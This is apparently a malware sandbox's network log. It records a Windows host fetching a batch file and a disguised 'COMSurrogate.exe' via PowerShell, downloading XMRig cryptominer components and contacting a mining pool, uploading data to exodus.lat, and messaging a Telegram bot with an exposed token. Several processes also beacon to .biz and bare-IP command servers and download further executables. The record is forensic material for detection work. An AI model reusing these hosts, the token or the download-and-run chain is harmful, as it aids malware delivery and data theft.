GET /add?substr=mixtwo&s=three&sub= HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 92.63.197.221
Connection: Keep-Alive
Cache-Control: no-cache
DNS

221.197.63.92.in-addr.arpa

Remote address:

8.8.8.8:53

Request

221.197.63.92.in-addr.arpa

IN PTR

Response
DNS

exodus.lat

curl.exe

Remote address:

8.8.8.8:53

Request

exodus.lat

IN A

Response

exodus.lat

IN A

203.161.45.11
DNS

exodus.lat

curl.exe

Remote address:

8.8.8.8:53

Request

exodus.lat

IN A

Response

exodus.lat

IN A

203.161.45.11
GET

https://exodus.lat/ss.bat

powershell.exe

Remote address:

203.161.45.11:443

Request

GET /ss.bat HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
Host: exodus.lat
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

keep-alive: timeout=5, max=100
content-type: application/x-msdownload
last-modified: Thu, 05 Dec 2024 00:35:03 GMT
accept-ranges: bytes
content-length: 6492
date: Fri, 06 Dec 2024 02:17:57 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
GET

https://exodus.lat/COMSurrogate.exe

powershell.exe

Remote address:

203.161.45.11:443

Request

GET /COMSurrogate.exe HTTP/1.1
Host: exodus.lat
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

keep-alive: timeout=5, max=100
content-type: application/x-msdownload
last-modified: Fri, 29 Nov 2024 20:45:59 GMT
accept-ranges: bytes
content-length: 167936
date: Fri, 06 Dec 2024 02:17:57 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
DNS

11.45.161.203.in-addr.arpa

Remote address:

8.8.8.8:53

Request

11.45.161.203.in-addr.arpa

IN PTR

Response

11.45.161.203.in-addr.arpa

IN PTR

server700-1shared spaceshiphost
DNS

11.45.161.203.in-addr.arpa

Remote address:

8.8.8.8:53

Request

11.45.161.203.in-addr.arpa

IN PTR

Response

11.45.161.203.in-addr.arpa

IN PTR

server700-1shared spaceshiphost
GET

https://exodus.lat/COMSurrogate.exe

powershell.exe

Remote address:

203.161.45.11:443

Request

GET /COMSurrogate.exe HTTP/1.1
Host: exodus.lat
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

keep-alive: timeout=5, max=100
content-type: application/x-msdownload
last-modified: Fri, 29 Nov 2024 20:45:59 GMT
accept-ranges: bytes
content-length: 167936
date: Fri, 06 Dec 2024 02:17:59 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
DNS

api.ipify.org

curl.exe

Remote address:

8.8.8.8:53

Request

api.ipify.org

IN A

Response

api.ipify.org

IN A

172.67.74.152

api.ipify.org

IN A

104.26.13.205

api.ipify.org

IN A

104.26.12.205
GET

https://api.ipify.org/

curl.exe

Remote address:

172.67.74.152:443

Request

GET / HTTP/1.1
Host: api.ipify.org
User-Agent: curl/7.55.1
Accept: */*

Response

HTTP/1.1 200 OK

Date: Fri, 06 Dec 2024 02:18:00 GMT
Content-Type: text/plain
Content-Length: 14
Connection: keep-alive
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 8ed8c865cddc9496-LHR
server-timing: cfL4;desc="?proto=TCP&rtt=48454&min_rtt=47181&rtt_var=15569&sent=6&recv=6&lost=0&retrans=0&sent_bytes=3278&recv_bytes=383&delivery_rate=79606&cwnd=253&unsent_bytes=0&cid=739fd754cb65078b&ts=456&x=0"
DNS

c.pki.goog

Remote address:

8.8.8.8:53

Request

c.pki.goog

IN A

Response

c.pki.goog

IN CNAME

pki-goog.l.google.com

pki-goog.l.google.com

IN A

142.250.200.35
GET

http://c.pki.goog/r/gsr1.crl

Remote address:

142.250.200.35:80

Request

GET /r/gsr1.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: c.pki.goog

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 1739
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Fri, 06 Dec 2024 01:39:53 GMT
Expires: Fri, 06 Dec 2024 02:29:53 GMT
Cache-Control: public, max-age=3000
Age: 2286
Last-Modified: Mon, 07 Oct 2024 07:18:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
GET

http://c.pki.goog/r/r4.crl

Remote address:

142.250.200.35:80

Request

GET /r/r4.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: c.pki.goog

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 436
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Fri, 06 Dec 2024 01:35:55 GMT
Expires: Fri, 06 Dec 2024 02:25:55 GMT
Cache-Control: public, max-age=3000
Age: 2524
Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
DNS

152.74.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

152.74.67.172.in-addr.arpa

IN PTR

Response
DNS

cdn-downloads.com

COMSurrogate.exe

Remote address:

8.8.8.8:53

Request

cdn-downloads.com

IN A

Response

cdn-downloads.com

IN A

203.161.45.11
GET

https://cdn-downloads.com/files/mi.exe

COMSurrogate.exe

Remote address:

203.161.45.11:443

Request

GET /files/mi.exe HTTP/1.1
Host: cdn-downloads.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

keep-alive: timeout=5, max=100
content-type: application/x-msdownload
last-modified: Tue, 03 Dec 2024 03:05:09 GMT
accept-ranges: bytes
content-length: 6412800
date: Fri, 06 Dec 2024 02:18:01 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
GET

https://cdn-downloads.com/files/config.json

COMSurrogate.exe

Remote address:

203.161.45.11:443

Request

GET /files/config.json HTTP/1.1
Host: cdn-downloads.com

Response

HTTP/1.1 200 OK

keep-alive: timeout=5, max=100
content-type: application/json
last-modified: Tue, 03 Dec 2024 03:05:09 GMT
accept-ranges: bytes
content-length: 2049
date: Fri, 06 Dec 2024 02:18:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
GET

https://cdn-downloads.com/files/WinRing0x64.sys

COMSurrogate.exe

Remote address:

203.161.45.11:443

Request

GET /files/WinRing0x64.sys HTTP/1.1
Host: cdn-downloads.com

Response

HTTP/1.1 200 OK

keep-alive: timeout=5, max=100
content-type: application/octet-stream
last-modified: Tue, 03 Dec 2024 03:05:09 GMT
accept-ranges: bytes
content-length: 14544
date: Fri, 06 Dec 2024 02:18:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
GET

https://cdn-downloads.com/files/SHA256SUMS

COMSurrogate.exe

Remote address:

203.161.45.11:443

Request

GET /files/SHA256SUMS HTTP/1.1
Host: cdn-downloads.com

Response

HTTP/1.1 200 OK

keep-alive: timeout=5, max=100
last-modified: Tue, 03 Dec 2024 03:05:09 GMT
accept-ranges: bytes
content-length: 256
date: Fri, 06 Dec 2024 02:18:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
GET

https://cdn-downloads.com/files/xmrig-cuda.dll

COMSurrogate.exe

Remote address:

203.161.45.11:443

Request

GET /files/xmrig-cuda.dll HTTP/1.1
Host: cdn-downloads.com

Response

HTTP/1.1 200 OK

keep-alive: timeout=5, max=100
content-type: application/x-msdownload
last-modified: Tue, 03 Dec 2024 03:05:09 GMT
accept-ranges: bytes
content-length: 32908288
date: Fri, 06 Dec 2024 02:18:05 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
GET

https://cdn-downloads.com/files/nvrtc64_102_0.dll

COMSurrogate.exe

Remote address:

203.161.45.11:443

Request

GET /files/nvrtc64_102_0.dll HTTP/1.1
Host: cdn-downloads.com
GET

https://cdn-downloads.com/files/nvrtc-builtins64_102.dll

COMSurrogate.exe

Remote address:

203.161.45.11:443

Request

GET /files/nvrtc-builtins64_102.dll HTTP/1.1
Host: cdn-downloads.com
POST

https://exodus.lat/files/upload.php

curl.exe

Remote address:

203.161.45.11:443

Request

POST /files/upload.php HTTP/1.1
Host: exodus.lat
User-Agent: curl/7.55.1
Accept: */*
Content-Length: 1746
Expect: 100-continue
Content-Type: multipart/form-data; boundary=------------------------e7f4cb1975d40687

Response

HTTP/1.1 200 OK

keep-alive: timeout=5, max=100
x-powered-by: PHP/7.4.33
content-type: text/html; charset=UTF-8
content-length: 85
date: Fri, 06 Dec 2024 02:18:02 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
DNS

r11.o.lencr.org

Remote address:

8.8.8.8:53

Request

r11.o.lencr.org

IN A

Response

r11.o.lencr.org

IN CNAME

o.lencr.edgesuite.net

o.lencr.edgesuite.net

IN CNAME

a1887.dscq.akamai.net

a1887.dscq.akamai.net

IN A

88.221.135.106

a1887.dscq.akamai.net

IN A

88.221.135.113
GET

http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgOYNUtL7HcF2OF3Zxn9WfNDZg%3D%3D

Remote address:

88.221.135.106:80

Request

GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgOYNUtL7HcF2OF3Zxn9WfNDZg%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: r11.o.lencr.org

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: application/ocsp-response
Content-Length: 504
ETag: "E970140DF7BE26B726C80651588A42F2B4806633592AD5D71420ACB9E1EBF4FC"
Last-Modified: Thu, 05 Dec 2024 00:36:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=16413
Expires: Fri, 06 Dec 2024 06:51:35 GMT
Date: Fri, 06 Dec 2024 02:18:02 GMT
Connection: keep-alive
DNS

168.245.100.95.in-addr.arpa

Remote address:

8.8.8.8:53

Request

168.245.100.95.in-addr.arpa

IN PTR

Response

168.245.100.95.in-addr.arpa

IN PTR

a95-100-245-168deploystaticakamaitechnologiescom
DNS

106.135.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

106.135.221.88.in-addr.arpa

IN PTR

Response

106.135.221.88.in-addr.arpa

IN PTR

a88-221-135-106deploystaticakamaitechnologiescom
DNS

location.services.mozilla.com

firefox.exe

Remote address:

8.8.8.8:53

Request

location.services.mozilla.com

IN A

Response

location.services.mozilla.com

IN CNAME

prod.classify-client.prod.webservices.mozgcp.net

prod.classify-client.prod.webservices.mozgcp.net

IN A

35.190.72.216
DNS

prod.balrog.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.balrog.prod.cloudops.mozgcp.net

IN A

Response

prod.balrog.prod.cloudops.mozgcp.net

IN A

35.244.181.201
DNS

prod.balrog.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.balrog.prod.cloudops.mozgcp.net

IN A

Response

prod.balrog.prod.cloudops.mozgcp.net

IN A

35.244.181.201
GET

https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb

firefox.exe

Remote address:

35.190.72.216:443

Request

GET /v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb HTTP/2.0
host: location.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
te: trailers
DNS

prod.classify-client.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.classify-client.prod.webservices.mozgcp.net

IN A

Response

prod.classify-client.prod.webservices.mozgcp.net

IN A

35.190.72.216
DNS

prod.balrog.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.balrog.prod.cloudops.mozgcp.net

IN AAAA

Response
DNS

201.181.244.35.in-addr.arpa

Remote address:

8.8.8.8:53

Request

201.181.244.35.in-addr.arpa

IN PTR

Response

201.181.244.35.in-addr.arpa

IN PTR

20118124435bcgoogleusercontentcom
DNS

prod.classify-client.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.classify-client.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

ciscobinary.openh264.org

firefox.exe

Remote address:

8.8.8.8:53

Request

ciscobinary.openh264.org

IN A

Response

ciscobinary.openh264.org

IN CNAME

a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com

a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com

IN CNAME

a17.rackcdn.com

a17.rackcdn.com

IN CNAME

a17.rackcdn.com.mdc.edgesuite.net

a17.rackcdn.com.mdc.edgesuite.net

IN CNAME

a19.dscg10.akamai.net

a19.dscg10.akamai.net

IN A

88.221.134.209

a19.dscg10.akamai.net

IN A

88.221.134.155
DNS

ciscobinary.openh264.org

firefox.exe

Remote address:

8.8.8.8:53

Request

ciscobinary.openh264.org

IN A

Response

ciscobinary.openh264.org

IN CNAME

a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com

a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com

IN CNAME

a17.rackcdn.com

a17.rackcdn.com

IN CNAME

a17.rackcdn.com.mdc.edgesuite.net

a17.rackcdn.com.mdc.edgesuite.net

IN CNAME

a19.dscg10.akamai.net

a19.dscg10.akamai.net

IN A

88.221.134.209

a19.dscg10.akamai.net

IN A

88.221.134.155
DNS

redirector.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

redirector.gvt1.com

IN A

Response

redirector.gvt1.com

IN A

142.250.187.206
GET

https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip

firefox.exe

Remote address:

142.250.187.206:443

Request

GET /edgedl/widevine-cdm/4.10.2710.0-win-x64.zip HTTP/2.0
host: redirector.gvt1.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
te: trailers
DNS

redirector.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

redirector.gvt1.com

IN A

Response

redirector.gvt1.com

IN A

142.250.187.206
DNS

redirector.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

redirector.gvt1.com

IN A

Response

redirector.gvt1.com

IN A

142.250.187.206
GET

http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip

firefox.exe

Remote address:

88.221.134.209:80

Request

GET /openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip HTTP/1.1
Host: ciscobinary.openh264.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

Response

HTTP/1.1 200 OK

Last-Modified: Fri, 08 Nov 2024 02:37:54 GMT
ETag: 09372174e83dbbf696ee732fd2e875bb
Content-Length: 491284
Accept-Ranges: bytes
X-Timestamp: 1731033473.13891
Content-Type: application/zip
X-Trans-Id: txe2d6fd5524464f55a6fac-00673047f0dfw1
Cache-Control: public, max-age=79381
Expires: Sat, 07 Dec 2024 00:21:14 GMT
Date: Fri, 06 Dec 2024 02:18:13 GMT
Connection: keep-alive
DNS

a19.dscg10.akamai.net

firefox.exe

Remote address:

8.8.8.8:53

Request

a19.dscg10.akamai.net

IN A

Response

a19.dscg10.akamai.net

IN A

88.221.134.209

a19.dscg10.akamai.net

IN A

88.221.134.155
DNS

a19.dscg10.akamai.net

firefox.exe

Remote address:

8.8.8.8:53

Request

a19.dscg10.akamai.net

IN A

Response

a19.dscg10.akamai.net

IN A

88.221.134.209

a19.dscg10.akamai.net

IN A

88.221.134.155
DNS

a19.dscg10.akamai.net

firefox.exe

Remote address:

8.8.8.8:53

Request

a19.dscg10.akamai.net

IN AAAA

Response

a19.dscg10.akamai.net

IN AAAA

2a02:26f0:a1::58dd:869b

a19.dscg10.akamai.net

IN AAAA

2a02:26f0:a1::58dd:86d1
DNS

redirector.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

redirector.gvt1.com

IN AAAA

Response

redirector.gvt1.com

IN AAAA

2a00:1450:4009:81f::200e
DNS

r4---sn-aigzrnsz.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

r4---sn-aigzrnsz.gvt1.com

IN A

Response

r4---sn-aigzrnsz.gvt1.com

IN CNAME

r4.sn-aigzrnsz.gvt1.com

r4.sn-aigzrnsz.gvt1.com

IN A

74.125.175.169
GET

https://r4---sn-aigzrnsz.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1733451493,&mh=R8&mip=181.215.176.83&mm=28&mn=sn-aigzrnsz&ms=nvh&mt=1733451136&mv=m&mvi=4&pl=25&rmhost=r1---sn-aigzrnsz.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r2---sn-aigzrn7s.gvt1.com

firefox.exe

Remote address:

74.125.175.169:443

Request

GET /edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1733451493,&mh=R8&mip=181.215.176.83&mm=28&mn=sn-aigzrnsz&ms=nvh&mt=1733451136&mv=m&mvi=4&pl=25&rmhost=r1---sn-aigzrnsz.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r2---sn-aigzrn7s.gvt1.com HTTP/1.1
Host: r4---sn-aigzrnsz.gvt1.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Cache-Control: public,max-age=86400
Content-Disposition: attachment
Content-Length: 14485862
Content-Security-Policy: default-src 'none'
Content-Type: application/zip
Etag: "1d3918c"
Server: downloads
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 0
Date: Thu, 05 Dec 2024 12:44:59 GMT
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Last-Modified: Thu, 05 Oct 2023 00:56:47 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,quic=":443"; ma=2592000; v="46"
Vary: Origin
DNS

r4.sn-aigzrnsz.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

r4.sn-aigzrnsz.gvt1.com

IN A

Response

r4.sn-aigzrnsz.gvt1.com

IN A

74.125.175.169
DNS

r4.sn-aigzrnsz.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

r4.sn-aigzrnsz.gvt1.com

IN AAAA

Response

r4.sn-aigzrnsz.gvt1.com

IN AAAA

2a00:1450:4009:1b::9
DNS

r4.sn-aigzrnsz.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

r4.sn-aigzrnsz.gvt1.com

IN AAAA

Response

r4.sn-aigzrnsz.gvt1.com

IN AAAA

2a00:1450:4009:1b::9
DNS

216.72.190.35.in-addr.arpa

Remote address:

8.8.8.8:53

Request

216.72.190.35.in-addr.arpa

IN PTR

Response

216.72.190.35.in-addr.arpa

IN PTR

2167219035bcgoogleusercontentcom
DNS

31.243.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

31.243.111.52.in-addr.arpa

IN PTR

Response
DNS

209.134.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

209.134.221.88.in-addr.arpa

IN PTR

Response

209.134.221.88.in-addr.arpa

IN PTR

a88-221-134-209deploystaticakamaitechnologiescom
DNS

169.175.125.74.in-addr.arpa

Remote address:

8.8.8.8:53

Request

169.175.125.74.in-addr.arpa

IN PTR

Response

169.175.125.74.in-addr.arpa

IN PTR

lhr48s34-in-f91e100net
DNS

play.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN A
DNS

play.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN A

Response

play.google.com

IN A

142.250.179.238
DNS

play.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN AAAA

Response

play.google.com

IN AAAA

2a00:1450:4009:81d::200e
DNS

play.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN AAAA

Response

play.google.com

IN AAAA

2a00:1450:4009:81d::200e
DNS

238.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

238.179.250.142.in-addr.arpa

IN PTR

Response

238.179.250.142.in-addr.arpa

IN PTR

lhr25s31-in-f141e100net
DNS

prod.balrog.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.balrog.prod.cloudops.mozgcp.net

IN AAAA

Response
DNS

prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN A

Response

prod.remote-settings.prod.webservices.mozgcp.net

IN A

34.149.100.209
DNS

prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

api.telegram.org

COMSurrogate.exe

Remote address:

8.8.8.8:53

Request

api.telegram.org

IN A

Response

api.telegram.org

IN A

149.154.167.220
POST

https://api.telegram.org/bot7859424075:AAH6p20Kp3COdNOyzKY7oNWwCIVNCkgfzac/sendMessage

COMSurrogate.exe

Remote address:

149.154.167.220:443

Request

POST /bot7859424075:AAH6p20Kp3COdNOyzKY7oNWwCIVNCkgfzac/sendMessage HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: api.telegram.org
Content-Length: 58
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Fri, 06 Dec 2024 02:18:34 GMT
Content-Type: application/json
Content-Length: 289
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
DNS

pool.hashvault.pro

mi.exe

Remote address:

8.8.8.8:53

Request

pool.hashvault.pro

IN A

Response

pool.hashvault.pro

IN A

95.179.241.203
DNS

220.167.154.149.in-addr.arpa

Remote address:

8.8.8.8:53

Request

220.167.154.149.in-addr.arpa

IN PTR

Response
DNS

203.241.179.95.in-addr.arpa

Remote address:

8.8.8.8:53

Request

203.241.179.95.in-addr.arpa

IN PTR

Response

203.241.179.95.in-addr.arpa

IN PTR

95179241203vultrusercontentcom
DNS

203.241.179.95.in-addr.arpa

Remote address:

8.8.8.8:53

Request

203.241.179.95.in-addr.arpa

IN PTR

Response

203.241.179.95.in-addr.arpa

IN PTR

95179241203vultrusercontentcom
GET

https://188.119.66.185/ai/?key=8f3f2b3ae647176a7048b2a8231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa158305633775b0e650fdba1e9c95b1c92975ccf55bc592fa5a818ece02a1b7e2984c57cad7021ddd372118d73788

rafencoder.exe

Remote address:

188.119.66.185:443

Request

GET /ai/?key=8f3f2b3ae647176a7048b2a8231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa158305633775b0e650fdba1e9c95b1c92975ccf55bc592fa5a818ece02a1b7e2984c57cad7021ddd372118d73788 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 06 Dec 2024 02:18:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
GET

https://188.119.66.185/ai/?key=8f3f2b3ae647176a7048b2a8231e72eee7c4db7e40b92a8dcd6c946a4ebd42809e7c4ce718c34f7f637df3b70caaf94cda91a6967478d3f44cc588fa45d7d69e43faeaa5960502d18f414ad332231ad03489d5d69359

rafencoder.exe

Remote address:

188.119.66.185:443

Request

GET /ai/?key=8f3f2b3ae647176a7048b2a8231e72eee7c4db7e40b92a8dcd6c946a4ebd42809e7c4ce718c34f7f637df3b70caaf94cda91a6967478d3f44cc588fa45d7d69e43faeaa5960502d18f414ad332231ad03489d5d69359 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 06 Dec 2024 02:19:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
DNS

185.66.119.188.in-addr.arpa

Remote address:

8.8.8.8:53

Request

185.66.119.188.in-addr.arpa

IN PTR

Response
DNS

233.38.18.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

233.38.18.104.in-addr.arpa

IN PTR

Response
DNS

23.149.64.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

23.149.64.172.in-addr.arpa

IN PTR

Response
DNS

206.157.214.31.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.157.214.31.in-addr.arpa

IN PTR

Response

206.157.214.31.in-addr.arpa

IN PTR

mailwillionebizua
DNS

206.157.214.31.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.157.214.31.in-addr.arpa

IN PTR

Response

206.157.214.31.in-addr.arpa

IN PTR

mailwillionebizua

172.67.165.166:443

https://atten-supporse.biz/api

tls, http

2M4078.exe

1.0kB
4.8kB
9
9

HTTP Request

POST https://atten-supporse.biz/api

HTTP Response

200
104.21.81.153:443

https://se-blurry.biz/api

tls, http

2M4078.exe

995 B
4.8kB
9
9

HTTP Request

POST https://se-blurry.biz/api

HTTP Response

200
185.215.113.43:80

http://185.215.113.43/Zu7JuNko/index.php

http

skotes.exe

2.9kB
3.4kB
23
16

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200
172.67.136.167:443

https://zinc-sneark.biz/api

tls, http

2M4078.exe

999 B
4.8kB
9
9

HTTP Request

POST https://zinc-sneark.biz/api

HTTP Response

200
172.67.153.96:443

https://dwell-exclaim.biz/api

tls, http

2M4078.exe

1.0kB
4.8kB
9
9

HTTP Request

POST https://dwell-exclaim.biz/api

HTTP Response

200
31.41.244.11:80

http://31.41.244.11/files/unique2/random.exe

http

skotes.exe

455.0kB
15.2MB
9708
15588

HTTP Request

GET http://31.41.244.11/files/7427009775/BhD8htX.exe

HTTP Response

200

HTTP Request

GET http://31.41.244.11/files/151334531/i1A5m12.exe

HTTP Response

200

HTTP Request

GET http://31.41.244.11/files/1818813749/wL3EGdM.exe

HTTP Response

200

HTTP Request

GET http://31.41.244.11/files/unique2/random.exe

HTTP Response

200
172.67.173.74:443

https://formy-spill.biz/api

tls, http

2M4078.exe

999 B
4.8kB
9
9

HTTP Request

POST https://formy-spill.biz/api

HTTP Response

200
104.21.81.153:443

https://se-blurry.biz/api

tls, http

BhD8htX.exe

995 B
4.7kB
9
9

HTTP Request

POST https://se-blurry.biz/api

HTTP Response

200
172.67.206.64:443

https://covery-mover.biz/api

tls, http

2M4078.exe

1.0kB
4.8kB
9
9

HTTP Request

POST https://covery-mover.biz/api

HTTP Response

200
172.67.136.167:443

https://zinc-sneark.biz/api

tls, http

BhD8htX.exe

999 B
4.8kB
9
9

HTTP Request

POST https://zinc-sneark.biz/api

HTTP Response

200
104.21.43.156:443

https://dare-curbys.biz/api

tls, http

2M4078.exe

